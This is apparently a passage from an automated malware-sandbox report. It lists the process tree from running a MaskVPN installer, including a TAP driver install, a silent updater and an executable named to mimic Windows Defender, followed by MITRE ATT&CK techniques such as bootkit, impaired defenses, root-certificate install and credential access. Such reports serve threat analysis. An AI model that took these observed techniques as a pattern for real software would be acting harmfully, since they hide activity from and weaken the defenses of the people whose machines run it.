PID:5856

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:1120

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:4540

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:4508
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7472d4bc-faa9-1d4b-bcbd-34180234896d}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:5076
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
  2⤵
  PID:5104

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:4104

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:3936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3192

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6952

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:3184
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:6588

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6016

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2484

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\32c9b9db8fc94e6f8464f52341fe2c81 /t 4300 /p 2484
1⤵
PID:5320

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:5236

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Bootkit

T1067

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery